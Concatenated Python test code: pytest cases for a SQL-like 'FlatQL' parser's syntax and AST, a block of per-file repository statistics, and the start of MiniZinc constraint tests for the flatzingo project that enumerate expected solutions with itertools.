        "SELECT 1 + 1 AS \"binary_alias\" FROM table_name",
        "SELECT (1 + 1) FROM table_name",
        "SELECT (1 + 1) AS \"binary_alias\" FROM table_name",
        "SELECT table.column + 1 FROM table_name",
        "SELECT table.column + 1 AS \"binary_alias\" FROM table_name",
        "SELECT table.column + table.column1 FROM table_name",
        "SELECT table.column + table.column1 AS \"binary_alias\" FROM table_name",
        "SELECT table.column + table.column1 * 2 / table.column3 AS \"binary_alias\" FROM table_name",
        "SELECT toYear(table.column) + table.column + 1 FROM table_name",
        "SELECT toYear(table.column) + count(table.column1) + 1 FROM table_name",
    )
    for query in accepted:
        assert parse_flatql(query) is not None
    # Reserved words and digit-leading identifiers must be rejected.
    rejected = (
        "SELECT table.column FROM select",
        "SELECT select.column FROM select",
        "SELECT table.column FROM ",
        "SELECT table.column FROM 0table",
        "SELECT table.0column FROM table",
        "SELECT select.integer FROM table",
    )
    for query in rejected:
        with pytest.raises(SyntaxError):
            parse_flatql(query)
def test_predicate_syntax():
    """WHERE-clause comparison, NULL, IN, LIKE and BETWEEN forms all parse.

    Fix: the original asserted the very first query twice (two identical
    lines); the duplicate is removed. Coverage is otherwise unchanged.
    """
    accepted = (
        "SELECT table.column FROM \"table_name\" WHERE table.column = 'test'",
        "SELECT table.column FROM table_name WHERE \"table\".column != 'test'",
        "SELECT table.column FROM table_name WHERE \"from\".\"integer\" = 1",
        "SELECT table.column FROM table_name WHERE table.column = 1.01",
        "SELECT table.column FROM table_name WHERE table.column = -1.01",
        "SELECT table.column FROM table_name WHERE table.column > -1.01",
        "SELECT table.column FROM table_name WHERE table.column < -1.01",
        "SELECT table.column FROM table_name WHERE table.column >= -1.01",
        "SELECT table.column FROM table_name WHERE table.column <= -1.01",
        "SELECT table.column FROM table_name WHERE table.column IS NULL",
        "SELECT table.column FROM table_name WHERE fun(table.column) IS NULL",
        "SELECT table.column FROM table_name WHERE table.column IS NOT NULL",
        "SELECT table.column FROM table_name WHERE table.column IN ('a', 'a')",
        "SELECT table.column FROM table_name WHERE table.column IN (1, 1)",
        "SELECT table.column FROM table_name WHERE table.column IN (1.0, 1.0)",
        "SELECT table.column FROM table_name WHERE fun(table.column) IN (1.0, 1.0)",
        "SELECT table.column FROM table_name WHERE table.column NOT IN (1.0, 1.0)",
        "SELECT table.column FROM table_name WHERE table.column LIKE 'aaa'",
        "SELECT table.column FROM table_name WHERE fun(table.column) LIKE 'aaa'",
        "SELECT table.column FROM table_name WHERE table.column NOT LIKE 'aaa'",
        "SELECT table.column FROM table_name WHERE table.column BETWEEN 1 AND 2",
        "SELECT table.column FROM table_name WHERE fun(table.column) BETWEEN 1 AND 2",
        "SELECT table.column FROM table_name WHERE table.column NOT BETWEEN 1 AND 2",
        "SELECT table.column FROM table_name WHERE count(table.column) > 10",
        "SELECT table.column FROM table_name WHERE count(\"select\".\"integer\") > 10",
        "SELECT table.column FROM table_name WHERE table.column IN (1.0, 1.0) "
        "AND count(table.column) > 10",
        "SELECT table.column FROM table_name WHERE table.column <= -1.01 AND table.column <= -1.01",
        "SELECT table.column FROM table_name WHERE table.column <= -1.01 AND table.column BETWEEN -1.01 AND -1 AND"
        " table.column <= -1.01 AND table.column LIKE 'aaa' AND table.column IN ('a', 'a')",
    )
    for query in accepted:
        assert parse_flatql(query) is not None
    # Reserved word "select" is not a valid table reference in a predicate,
    # and an alias is not allowed inside a comparison.
    rejected = (
        "SELECT table.column FROM table WHERE select.name = 'abc'",
        "SELECT table.column FROM table WHERE select.name AS table = 'abc'",
    )
    for query in rejected:
        with pytest.raises(SyntaxError):
            parse_flatql(query)
def test_order_by_syntax():
    """ORDER BY / LIMIT / OFFSET combinations parse; invalid forms raise."""
    accepted = (
        "SELECT table.column FROM table_name ORDER BY \"table\"",
        "SELECT table.column FROM table_name WHERE table.name = 'abc'"
        " ORDER BY \"table\" DESC, \"table1\" ASC",
        "SELECT table.column FROM table_name ORDER BY \"table1\" ASC OFFSET 10",
        "SELECT table.column FROM table_name ORDER BY \"table1\" ASC LIMIT 100 OFFSET 10",
    )
    for query in accepted:
        assert parse_flatql(query) is not None
    # OFFSET must be an integer; ORDER BY takes an identifier, not a column ref.
    rejected = (
        "SELECT table.column FROM table_name ORDER BY \"table1\" ASC OFFSET 10.0 ",
        "SELECT table.column FROM table_name ORDER BY table.name ASC LIMIT 10 ",
    )
    for query in rejected:
        with pytest.raises(SyntaxError):
            parse_flatql(query)
def test_comment_syntax():
    """Block and line comments are accepted; an unterminated block comment raises."""
    for query in (
        "/* comment */ SELECT table.column FROM table_name ORDER BY \"abc\"",
        "-- comment \n SELECT table.column FROM table_name ORDER BY \"abc\"",
    ):
        assert parse_flatql(query) is not None
    with pytest.raises(SyntaxError):
        parse_flatql("/* comment * SELECT table.column FROM table_name ORDER BY \"abc\"")
# noinspection PyUnresolvedReferences
def test_projection_parser1():
    """Quoted and unquoted column projections both become Column nodes."""
    ast: FlatQL = parse_flatql(
        "SELECT \"table\".\"column_1\", "
        " table.column_2"
        " FROM \"table\"")
    assert ast is not None
    projections = ast.projections
    assert projections is not None
    assert len(projections) == 2
    view = ast.view
    assert isinstance(view, View)
    # Raw token keeps the quotes; value() strips them.
    assert view.name._value == '"table"'
    assert view.name.value() == 'table'
    first, second = projections
    assert isinstance(first, Column)
    assert isinstance(second, Column)
    assert first.table.name._value == '"table"'
    assert first.name._value == '"column_1"'
    assert first.table.name.value() == 'table'
    assert first.name.value() == 'column_1'
def test_projection_parser2():
    """count() projections record whether their column argument was quoted."""
    ast: FlatQL = parse_flatql(
        "SELECT count(table.column), "
        " count(\"table\".column) "
        " FROM \"table\"")
    assert ast is not None
    assert ast.projections is not None
    assert len(ast.projections) == 2
    unquoted_call, quoted_call = ast.projections
    assert isinstance(unquoted_call, FunctionCall)
    assert isinstance(quoted_call, FunctionCall)
    assert unquoted_call.name == 'count'
    assert len(unquoted_call.args) == 1
    arg = unquoted_call.args[0]
    assert isinstance(arg, Column)
    assert not arg.table.name._is_quoted
    assert arg.table.name.value() == "table"
    assert not arg.name._is_quoted
    assert arg.name.value() == "column"
    assert quoted_call.name == 'count'
    assert len(quoted_call.args) == 1
    assert isinstance(quoted_call.args[0], Column)
    assert quoted_call.args[0].table.name._is_quoted
    assert quoted_call.args[0].table.name.value() == "table"
def test_projection_parser3():
    """Function arguments may mix a column with numeric and string literals."""
    ast: FlatQL = parse_flatql(
        "SELECT count(\"table\".column, 1, 'abc') "
        " FROM \"table\"")
    assert ast is not None
    assert ast.projections is not None
    assert len(ast.projections) == 1
    call = ast.projections[0]
    assert isinstance(call, FunctionCall)
    assert call.name == 'count'
    assert len(call.args) == 3
    column_arg, int_arg, str_arg = call.args
    assert isinstance(column_arg, Column)
    assert column_arg.table.name.value() == "table"
    assert column_arg.name.value() == "column"
    # Literal values come back as strings, unquoted.
    assert isinstance(int_arg, Literal)
    assert int_arg.value() == '1'
    assert isinstance(str_arg, Literal)
    assert str_arg.value() == 'abc'
def test_projection_parser4():
    """A bare table name inside count() becomes a Table node, even for quoted keywords."""
    ast: FlatQL = parse_flatql(
        "SELECT count(table), count(\"where\") "
        " FROM \"table\"")
    assert ast is not None
    assert ast.projections is not None
    assert len(ast.projections) == 2
    for call, expected_table in zip(ast.projections, ("table", "where")):
        assert isinstance(call, FunctionCall)
        assert call.name == 'count'
        assert len(call.args) == 1
        assert isinstance(call.args[0], Table)
        assert call.args[0].name.value() == expected_table
def test_projection_parser5():
    """An aliased column arithmetic projection parses as a BinaryExpression."""
    ast: FlatQL = parse_flatql(
        "SELECT table.column + table.column2 AS \"abc\""
        " FROM \"table\"")
    assert ast is not None
    assert ast.projections is not None
    assert len(ast.projections) == 1
    assert isinstance(ast.projections[0], BinaryExpression)
def test_projection_parser6():
    """A parenthesized arithmetic projection parses as a ParenExpression."""
    ast: FlatQL = parse_flatql(
        "SELECT (table.column + table.column2) AS \"abc\""
        " FROM \"table\"")
    assert ast is not None
    assert ast.projections is not None
    assert len(ast.projections) == 1
    assert isinstance(ast.projections[0], ParenExpression)
def test_projection_parser7():
    """A paren group multiplied by a function call is a BinaryExpression."""
    ast: FlatQL = parse_flatql(
        "SELECT (table.column + table.column2) * count(table.column) AS \"abc\""
        " FROM \"table\"")
    assert ast is not None
    assert ast.projections is not None
    assert len(ast.projections) == 1
    assert isinstance(ast.projections[0], BinaryExpression)
def test_projection_parser8():
    """Nested function calls inside arithmetic still yield one BinaryExpression."""
    ast: FlatQL = parse_flatql(
        "SELECT (table.column + table.column2) * count(table.column) + toYear(now()) AS \"abc\""
        " FROM \"table\"")
    assert ast is not None
    assert ast.projections is not None
    assert len(ast.projections) == 1
    assert isinstance(ast.projections[0], BinaryExpression)
# noinspection PyUnresolvedReferences
def test_predicate_parser1():
    """AND-chained comparisons parse into a LogicalExpression of Comparison nodes."""
    ast: FlatQL = parse_flatql("SELECT table.column_1"
                               " FROM table_set_name WHERE table.name = 'abc'"
                               " AND \"from\".\"name\" != 'abc' "
                               " AND \"table\".\"name\" != 11.1 ")
    predicates = ast.predicates
    assert isinstance(predicates, LogicalExpression)
    first, second, third = predicates[0], predicates[1], predicates[2]
    assert isinstance(first, Comparison)
    assert isinstance(second, Comparison)
    assert isinstance(first.operand, Column)
    assert isinstance(first.literal, Literal)
    assert first.operand.table.name.value() == 'table'
    assert first.operand.name.value() == 'name'
    assert first.operator == '='
    assert second.operator == '!='
    assert second.literal.value() == 'abc'
    assert third.operator == '!='
    assert third.literal.value() == '11.1'
# noinspection PyUnresolvedReferences
def test_predicate_parser2():
    """IS NOT NULL / IS NULL parse to IsNull nodes with the negation flag set."""
    ast: FlatQL = parse_flatql("SELECT table.column_1"
                               " FROM table_set_name WHERE table.name IS NOT NULL"
                               " AND \"table\".\"name\" IS NULL ")
    assert len(ast.predicates) == 2
    negated_pred, plain_pred = ast.predicates[0], ast.predicates[1]
    assert isinstance(negated_pred, IsNull)
    assert isinstance(plain_pred, IsNull)
    assert isinstance(negated_pred.operand, Column)
    assert isinstance(plain_pred.operand, Column)
    assert negated_pred.negated
    assert not plain_pred.negated
# noinspection PyUnresolvedReferences
def test_predicate_parser3():
    """NOT BETWEEN / BETWEEN parse to Between nodes carrying both bound literals."""
    ast: FlatQL = parse_flatql("SELECT table.column_1"
                               " FROM table_set_name WHERE table.name NOT BETWEEN 1 AND 12"
                               " AND \"table\".\"name\" BETWEEN 1 AND 12 ")
    assert len(ast.predicates) == 2
    negated_pred, plain_pred = ast.predicates[0], ast.predicates[1]
    assert isinstance(negated_pred, Between)
    assert isinstance(plain_pred, Between)
    assert isinstance(negated_pred.operand, Column)
    assert isinstance(plain_pred.operand, Column)
    assert negated_pred.negated
    assert not plain_pred.negated
    assert negated_pred.literal1.value() == '1'
    assert negated_pred.literal2.value() == '12'
# noinspection PyUnresolvedReferences
def test_predicate_parser4():
    """NOT LIKE / LIKE parse to Like nodes holding the pattern string."""
    ast: FlatQL = parse_flatql("SELECT table.column_1"
                               " FROM table_set_name WHERE table.name NOT LIKE '%abc'"
                               " AND \"table\".\"name\" LIKE '%abc' ")
    assert len(ast.predicates) == 2
    negated_pred, plain_pred = ast.predicates[0], ast.predicates[1]
    assert isinstance(negated_pred, Like)
    assert isinstance(plain_pred, Like)
    assert isinstance(negated_pred.operand, Column)
    assert isinstance(plain_pred.operand, Column)
    assert negated_pred.negated
    assert not plain_pred.negated
    assert negated_pred.string_literal.value() == '%abc'
    assert plain_pred.string_literal.value() == '%abc'
# noinspection PyUnresolvedReferences
def test_predicate_parser5():
    """NOT IN / IN parse to In nodes with the full literal list."""
    ast: FlatQL = parse_flatql("SELECT table.column_1"
                               " FROM table_set_name WHERE table.name NOT IN ('aa', '12')"
                               " AND \"table\".\"name\" IN ('aa', '12') ")
    assert len(ast.predicates) == 2
    negated_pred, plain_pred = ast.predicates[0], ast.predicates[1]
    assert isinstance(negated_pred, In)
    assert isinstance(plain_pred, In)
    assert isinstance(negated_pred.operand, Column)
    assert isinstance(plain_pred.operand, Column)
    assert negated_pred.negated
    assert not plain_pred.negated
    assert len(plain_pred.literals) == 2
    assert plain_pred.literals[0].value() == 'aa'
    assert plain_pred.literals[1].value() == '12'
# noinspection PyUnresolvedReferences
def test_predicate_parser6():
    """A function call can be the operand of an IN predicate."""
    ast: FlatQL = parse_flatql("SELECT table.column_1"
                               " FROM table_set_name WHERE fun(table.name) IN ('aa', '12')")
    assert len(ast.predicates) == 1
    predicate = ast.predicates[0]
    assert isinstance(predicate, In)
    operand = predicate.operand
    assert isinstance(operand, FunctionCall)
    assert operand.name == "fun"
    assert len(operand.args) == 1
    assert isinstance(operand.args[0], Column)
    assert not predicate.negated
    assert len(predicate.literals) == 2
    assert predicate.literals[0].value() == 'aa'
    assert predicate.literals[1].value() == '12'
# noinspection PyUnresolvedReferences
def test_predicate_parser7():
    """A bare function call is a valid standalone predicate."""
    ast: FlatQL = parse_flatql("SELECT table.column_1"
                               " FROM table_set_name WHERE if_null(table.column1)")
    assert len(ast.predicates) == 1
    assert isinstance(ast.predicates[0], FunctionCall)
def test_predicate_parser8():
    """A string array argument in a predicate parses as an ArrayLiteral."""
    ast: FlatQL = parse_flatql("SELECT table.column_1"
                               " FROM table_set_name WHERE has(table.column1, ['1', '2'])")
    assert len(ast.predicates) == 1
    call = ast.predicates[0]
    assert isinstance(call, FunctionCall)
    assert isinstance(call.args[1], ArrayLiteral)
def test_predicate_parser9():
    """A numeric array argument in a predicate parses as an ArrayLiteral."""
    ast: FlatQL = parse_flatql("SELECT table.column_1"
                               " FROM table_set_name WHERE has_any(table.column1, [1, 2])")
    assert len(ast.predicates) == 1
    call = ast.predicates[0]
    assert isinstance(call, FunctionCall)
    assert isinstance(call.args[1], ArrayLiteral)
def test_predicate_parser10():
    """A quoted-string array argument in a predicate parses as an ArrayLiteral."""
    ast: FlatQL = parse_flatql("SELECT table.column_1"
                               " FROM table_set_name WHERE has_any(table.column1, ['abc', 'abc'])")
    assert len(ast.predicates) == 1
    call = ast.predicates[0]
    assert isinstance(call, FunctionCall)
    assert isinstance(call.args[1], ArrayLiteral)
# noinspection PyUnresolvedReferences
def test_order_by_parser1():
    """An explicit DESC direction is recorded on the order-by item."""
    ast: FlatQL = parse_flatql("SELECT table.column_1, table.column_2 FROM table_set_name "
                               " ORDER BY \"table\" DESC")
    assert ast is not None
    items = ast.order_by_items
    assert items is not None
    assert len(items) == 1
    assert isinstance(items[0].node, Identifier)
    assert items[0].direction == 'DESC'
# noinspection PyUnresolvedReferences
def test_order_by_parser2():
    """Ordering by a projection alias yields an Identifier with direction 'ASC'."""
    ast: FlatQL = parse_flatql("SELECT COUNT(table.column) AS \"count_table\" FROM table_set_name "
                               " ORDER BY \"count_table\"")
    assert ast is not None
    items = ast.order_by_items
    assert items is not None
    assert len(items) == 1
    assert isinstance(items[0].node, Identifier)
    assert items[0].direction == 'ASC'
def test_limit_parser():
    """LIMIT <n> is captured as a literal on the statement."""
    ast: FlatQL = parse_flatql("SELECT table.column_1, table.column_2 FROM table_set_name "
                               " LIMIT 10")
    assert ast is not None
    assert ast.limit is not None
    assert ast.limit.literal.value() == '10'
def test_offset_parser():
    """OFFSET <n> is captured as a literal on the statement."""
    ast: FlatQL = parse_flatql("SELECT table.column_1, table.column_2 FROM table_set_name OFFSET 10")
    assert ast is not None
    assert ast.offset is not None
    assert ast.offset.literal.value() == '10'
def test_limit_offset_parser():
    """LIMIT and OFFSET may appear together; both literals are captured."""
    ast: FlatQL = parse_flatql("SELECT table.column_1, table.column_2 FROM table_set_name LIMIT 1 OFFSET 10")
    assert ast is not None
    assert ast.limit is not None
    assert ast.offset is not None
    assert ast.limit.literal.value() == '1'
    assert ast.offset.literal.value() == '10'
def test_parse_qualified_name():
    """Dotted identifiers split into QualifiedName parts; malformed names raise."""
    cases = (
        ("table", QualifiedName("table")),
        ("_table", QualifiedName("_table")),
        ("table_2", QualifiedName("table_2")),
        ("table.name", QualifiedName("table", "name")),
        ("table.name.name", QualifiedName("table", "name", "name")),
    )
    for text, expected in cases:
        assert parse_qualified_name(text) == expected
    # Leading digits and trailing dots are invalid.
    for bad in ("1table", "table."):
        with pytest.raises(SyntaxError):
            parse_qualified_name(bad)
def test_parse_join_condition():
    """Join conditions accept equality, IN, IS NOT NULL, BETWEEN and LIKE clauses."""
    conditions = (
        "Table1.id = Table2.table1_id",
        "Table1.id = Table2.table1_id AND Table1.name IN ('a', 'b')",
        "Table1.name IN ('a', 'b')",
        "Table1.id = 12",
        "Table1.id = Table2.table1_id AND Table1.name IS NOT NULL",
        "Table1.id = Table2.table1_id AND Table1.id BETWEEN 1 AND 12",
        "Table1.id = Table2.table1_id AND Table1.name LIKE '%a'",
    )
    for condition in conditions:
        assert parse_join_condition(condition) is not None
def test_parse_binary_expression1():
    """Arithmetic expressions over literals, columns and function calls all parse."""
    expressions = (
        "1 + 1",
        "(1 + 1) * 2 / 3 - 1 ** 2",
        "round(3 / 10) * 100",
        "round(3 / 10)",
        "round(3) + fun(Table.column)",
        "fun(Table.column)",
        "SUM(Table.column) / COUNT(Table.column) * 100 + toYear(now())",
    )
    for expression in expressions:
        assert parse_binary_expression(expression) is not None
# noinspection PyUnresolvedReferences
def test_parse_case_when1():
    """CASE WHEN with a comparison condition parses into a CaseExpression."""
    ast = parse_flatql("SELECT CASE WHEN Table.column = 1 THEN Table.column2 END FROM table_set_name")
    assert ast is not None
    assert len(ast.projections) == 1
    case = ast.projections[0]
    assert isinstance(case, CaseExpression)
    assert len(case.whens_expressions) == 1
    condition = case.whens_expressions[0].logical_expression
    assert len(condition) == 1
    assert isinstance(condition[0], Comparison)
# noinspection PyUnresolvedReferences
def test_parse_case_when2():
    """An IN membership test inside WHEN parses to an In node."""
    parsed = parse_flatql("SELECT CASE WHEN Table.column IN ('a', 'b') THEN Table.column2 END FROM table_set_name")
    assert parsed is not None
    assert len(parsed.projections) == 1
    case_expression = parsed.projections[0]
    assert isinstance(case_expression, CaseExpression)
    whens = case_expression.whens_expressions
    assert len(whens) == 1
    conditions = whens[0].logical_expression
    assert len(conditions) == 1
    assert isinstance(conditions[0], In)
# noinspection PyUnresolvedReferences
def test_parse_case_when3():
    """A BETWEEN range test inside WHEN parses to a Between node."""
    parsed = parse_flatql("SELECT CASE WHEN Table.column BETWEEN 1 AND 2 THEN Table.column2 END FROM table_set_name")
    assert parsed is not None
    assert len(parsed.projections) == 1
    case_expression = parsed.projections[0]
    assert isinstance(case_expression, CaseExpression)
    whens = case_expression.whens_expressions
    assert len(whens) == 1
    conditions = whens[0].logical_expression
    assert len(conditions) == 1
    assert isinstance(conditions[0], Between)
# noinspection PyUnresolvedReferences
def test_parse_case_when4():
    """A LIKE pattern test inside WHEN parses to a Like node."""
    parsed = parse_flatql("SELECT CASE WHEN Table.column LIKE '%a' THEN Table.column2 END FROM table_set_name")
    assert parsed is not None
    assert len(parsed.projections) == 1
    case_expression = parsed.projections[0]
    assert isinstance(case_expression, CaseExpression)
    whens = case_expression.whens_expressions
    assert len(whens) == 1
    conditions = whens[0].logical_expression
    assert len(conditions) == 1
    assert isinstance(conditions[0], Like)
# noinspection PyUnresolvedReferences
def test_parse_case_when5():
    """An IS NULL test inside WHEN parses to an IsNull node."""
    parsed = parse_flatql("SELECT CASE WHEN Table.column IS NULL THEN Table.column2 END FROM table_set_name")
    assert parsed is not None
    assert len(parsed.projections) == 1
    case_expression = parsed.projections[0]
    assert isinstance(case_expression, CaseExpression)
    whens = case_expression.whens_expressions
    assert len(whens) == 1
    conditions = whens[0].logical_expression
    assert len(conditions) == 1
    assert isinstance(conditions[0], IsNull)
# noinspection PyUnresolvedReferences
def test_parse_case_when6():
    """Two AND-joined conditions inside one WHEN yield two logical entries."""
    parsed = parse_flatql("SELECT CASE WHEN Table.column IS NULL AND Table.column IS NOT NULL THEN Table.column2 END "
                          "FROM table_set_name")
    assert parsed is not None
    assert len(parsed.projections) == 1
    case_expression = parsed.projections[0]
    assert isinstance(case_expression, CaseExpression)
    whens = case_expression.whens_expressions
    assert len(whens) == 1
    conditions = whens[0].logical_expression
    assert len(conditions) == 2
    assert isinstance(conditions[0], IsNull)
# noinspection PyUnresolvedReferences
def test_parse_case_when7():
    """Two WHEN branches plus an alias yield two when-expressions."""
    parsed = parse_flatql("SELECT CASE WHEN Table.column IS NULL THEN Table.column2 "
                          " WHEN Table.column IS NOT NULL THEN Table.column2 END AS \"alias\" "
                          "FROM table_set_name")
    assert parsed is not None
    assert len(parsed.projections) == 1
    case_expression = parsed.projections[0]
    assert isinstance(case_expression, CaseExpression)
    assert len(case_expression.whens_expressions) == 2
# noinspection PyUnresolvedReferences
def test_parse_case_when8():
    """A CASE expression nested inside an aggregate call still parses."""
    parsed = parse_flatql("SELECT COUNT(CASE WHEN Table.column IS NULL THEN 1 ELSE NULL END) AS \"alias\" "
                          "FROM table_set_name")
    assert parsed is not None
    assert len(parsed.projections) == 1
# noinspection PyUnresolvedReferences
def test_parse_case_when9():
    """An ELSE branch populates the case's else_expression."""
    parsed = parse_flatql("SELECT CASE WHEN Table.column IS NULL THEN Table.column2 "
                          "ELSE Table.column2 END AS \"alias\" "
                          "FROM table_set_name")
    assert parsed is not None
    assert len(parsed.projections) == 1
    case_expression = parsed.projections[0]
    assert isinstance(case_expression, CaseExpression)
    assert len(case_expression.whens_expressions) == 1
    assert case_expression.else_expression is not None
# noinspection PyUnresolvedReferences
def test_parse_case_when10():
    """A THEN branch may itself be an arithmetic expression."""
    parsed = parse_flatql("SELECT CASE WHEN Table.column IS NULL THEN Table.column2 + 100 "
                          "ELSE Table.column2 END AS \"alias\" "
                          "FROM table_set_name")
    assert parsed is not None
    assert len(parsed.projections) == 1
    case_expression = parsed.projections[0]
    assert isinstance(case_expression, CaseExpression)
    assert len(case_expression.whens_expressions) == 1
    assert case_expression.else_expression is not None
# noinspection PyUnresolvedReferences
def test_parse_case_when11():
    """A WHEN condition may be a bare function call."""
    parsed = parse_flatql("SELECT CASE WHEN if_null(Table.column) THEN Table.column2 + 100 "
                          "ELSE Table.column2 END AS \"alias\" "
                          "FROM table_set_name")
    assert parsed is not None
    assert len(parsed.projections) == 1
    case_expression = parsed.projections[0]
    assert isinstance(case_expression, CaseExpression)
    assert len(case_expression.whens_expressions) == 1
    assert case_expression.else_expression is not None
| 50.762226
| 130
| 0.712511
| 3,927
| 30,102
| 5.335625
| 0.036924
| 0.087147
| 0.052403
| 0.080895
| 0.925977
| 0.880781
| 0.830955
| 0.803322
| 0.776213
| 0.742328
| 0
| 0.021519
| 0.180254
| 30,102
| 592
| 131
| 50.847973
| 0.827606
| 0.025081
| 0
| 0.445887
| 0
| 0.012987
| 0.272089
| 0.003922
| 0
| 0
| 0
| 0
| 0.655844
| 1
| 0.088745
| false
| 0
| 0.006494
| 0
| 0.095238
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
74c28c94708e7af8a8478ee68c11bd533e7f7f4c
| 18,920
|
py
|
Python
|
tests/test_mzn.py
|
sthiele/flatzingo
|
2a2aa263a7b44b8773358267352321f439cc31ce
|
[
"MIT"
] | 1
|
2020-05-19T12:31:30.000Z
|
2020-05-19T12:31:30.000Z
|
tests/test_mzn.py
|
sthiele/flatzingo
|
2a2aa263a7b44b8773358267352321f439cc31ce
|
[
"MIT"
] | 9
|
2020-05-19T10:21:37.000Z
|
2020-07-02T08:58:23.000Z
|
tests/test_mzn.py
|
sthiele/flatzingo
|
2a2aa263a7b44b8773358267352321f439cc31ce
|
[
"MIT"
] | null | null | null |
from run import check
import itertools
import math
import operator
def toBool(*arg):
    """Turn a flat (flag, name, flag, name, ...) sequence into answer-set atoms.

    For every pair whose flag is truthy the string var("name") is emitted;
    pairs with a falsy flag contribute nothing.
    """
    # The name at i+1 is only touched when the flag at i is truthy.
    return [f'var("{arg[i + 1]}")' for i in range(0, len(arg), 2) if arg[i]]


# The two values a FlatZinc boolean can take, used to enumerate models below.
BOOL = [False, True]
def test_mzn_slow():
    """Exhaustively enumerate expected solutions for the slow MiniZinc builtins.

    Each check() call pairs a .mzn model with the full list of solutions
    computed here by brute force over the variables' domains; check()
    (from run.py) is expected to compare them against the solver's output.
    """
    ### integer builtins
    # element: a[b] == c over all array contents and indices (b is 1-based in MiniZinc).
    check("tests/mzn/array_var_int_element_1.mzn", [[f"b={b+1}", f"a1={list(a)[0]}", f"a2={list(a)[1]}", f"a3={list(a)[2]}", f"a4={list(a)[3]}", f"a5={list(a)[4]}", f"c={c}"] for b,c in itertools.product(range(0,5), range(-5,14)) for a in itertools.product(range(0,6), range(-3,4), range(-1,7), range(3,6), range(3,6)) if list(a)[b] == c ])
    # reified maximum: r <-> max(a,b,c,d) == m.
    check("tests/mzn/array_int_maximum_reif_1.mzn", [[f"a={a}", f"b={b}", f"c={c}", f"d={d}", f"m={m}"] + toBool(r,"r") for a,b,c,d,m,r in itertools.product(range(0,5), range(0,6), range(-5,3), range(-8,-2), range(0,9), BOOL ) if (r and max(a,b,c,d) == m) or (not r and not (max(a,b,c,d) == m)) ])
    ###TODO: recheck of own version im impl is done -> github minizinc
    #check("tests/mzn/array_int_maximum_imp_1.mzn", [[f"a={a}", f"b={b}", f"c={c}", f"d={d}", f"m={m}"] + toBool(r,"r") for a,b,c,d,m,r in itertools.product(range(0,5), range(0,6), range(-5,3), range(-8,-2), range(0,9), BOOL ) if (r and max(a,b,c,d) == m) or (not r) ])
    # reified minimum: r <-> min(a,b,c,d) == m.
    check("tests/mzn/array_int_minimum_reif_1.mzn", [[f"a={a}", f"b={b}", f"c={c}", f"d={d}", f"m={m}"] + toBool(r,"r") for a,b,c,d,m,r in itertools.product(range(0,5), range(0,6), range(-5,3), range(-8,-2), range(0,9), BOOL ) if (r and min(a,b,c,d) == m) or (not r and not (min(a,b,c,d) == m)) ])
    ###TODO: recheck of own version im impl is done -> github minizinc
    #check("tests/mzn/array_int_minimum_imp_1.mzn", [[f"a={a}", f"b={b}", f"c={c}", f"d={d}", f"m={m}"] + toBool(r,"r") for a,b,c,d,m,r in itertools.product(range(0,5), range(0,6), range(-5,3), range(-8,-2), range(0,9), BOOL ) if (r and min(a,b,c,d) == m) or (not r) ])
def test_mzn_fast():
    """Enumerate expected solutions for the fast MiniZinc builtin tests.

    For every .mzn model the complete solution set is generated by brute
    force over the variables' domains; `_reif` variants encode a full
    bi-implication with r, `_imp` variants only the forward implication
    (solutions with r false are unconstrained). `toBool` renders boolean
    assignments, f-strings render integer assignments.
    """
    ### integer builtins
    check("tests/mzn/all_different_1.mzn", [[f"x={x}", f"y={y}", f"z={z}"] for x,y,z in itertools.product(range(6), range(6), range(8)) if x!=y and x!=z and y!=z ])
    check("tests/mzn/array_int_element_1.mzn", [[f"b={b+1}", f"c={c}"] for b,a,c in itertools.product(range(0,5), [[1,2,4,6,12]], range(0,14)) if a[b] == c ])
    check("tests/mzn/array_int_maximum_1.mzn", [[f"a={a}", f"b={b}", f"c={c}", f"d={d}", f"m={m}"] for a,b,c,d,m in itertools.product(range(0,5), range(0,14), range(-5,3), range(-8,-2), range(0,17) ) if max(a,b,c,d) == m ])
    check("tests/mzn/array_int_minimum_1.mzn", [[f"a={a}", f"b={b}", f"c={c}", f"d={d}", f"m={m}"] for a,b,c,d,m in itertools.product(range(0,5), range(0,14), range(-5,3), range(-8,-2), range(-10,7) ) if min(a,b,c,d) == m ])
    check("tests/mzn/int_abs_1.mzn", [["x=-2", "y=2"], ["x=-1", "y=1"], ["x=0", "y=0"], ["x=1", "y=1"], ["y=2", "x=2"]])
    #revisit to maybe avoid symmetries ?
    # MiniZinc int division truncates toward zero; Python's // floors, hence the correction term.
    check("tests/mzn/int_div_1.mzn", [[f"a={a}", f"b={b}", f"c={c}"] for a,b,c in itertools.product(range(-3,10), itertools.chain(range(-5,0), range(1,6)), range(8)) if (a*b>0 and a//b == c) or ( a*b<=0 and (a+(-a%b))//b == c)], comp = operator.ge)
    check("tests/mzn/int_eq_1.mzn", [[f"a={a}", f"b={b}"] for a,b in itertools.product(range(-3,10), range(-5,6)) if a == b])
    check("tests/mzn/int_eq_reif_1.mzn", [[f"a={a}", f"b={b}"] + toBool(r,"r") for a,b,r in itertools.product(range(-3,10), range(-5,6), BOOL) if (r and a == b) or (not r and a != b)])
    check("tests/mzn/int_eq_imp_1.mzn", [[f"a={a}", f"b={b}"] + toBool(r,"r") for a,b,r in itertools.product(range(-3,10), range(-5,6), BOOL) if (r and a == b) or (not r)])
    check("tests/mzn/int_le_1.mzn", [[f"a={a}", f"b={b}"] for a,b in itertools.product(range(-3,10), range(-5,6)) if a <= b])
    check("tests/mzn/int_le_reif_1.mzn", [[f"a={a}", f"b={b}"] + toBool(r,"r") for a,b,r in itertools.product(range(-3,10), range(-5,6), BOOL) if (r and a <= b) or (not r and a > b)])
    check("tests/mzn/int_le_imp_1.mzn", [[f"a={a}", f"b={b}"] + toBool(r,"r") for a,b,r in itertools.product(range(-3,10), range(-5,6), BOOL) if (r and a <= b) or (not r)])
    check("tests/mzn/int_lin_eq_1.mzn", [[f"a={a}", f"b={b}"] for a,b in itertools.product(range(-3,10), range(-5,6)) if (3*a + 2*b) == 26])
    check("tests/mzn/int_lin_eq_reif_1.mzn", [[f"a={a}", f"b={b}"] + toBool(r,"r") for a,b,r in itertools.product(range(-3,10), range(-5,6), BOOL) if (r and (3*a + 2*b) == 26) or (not r and (3*a + 2*b) != 26)])
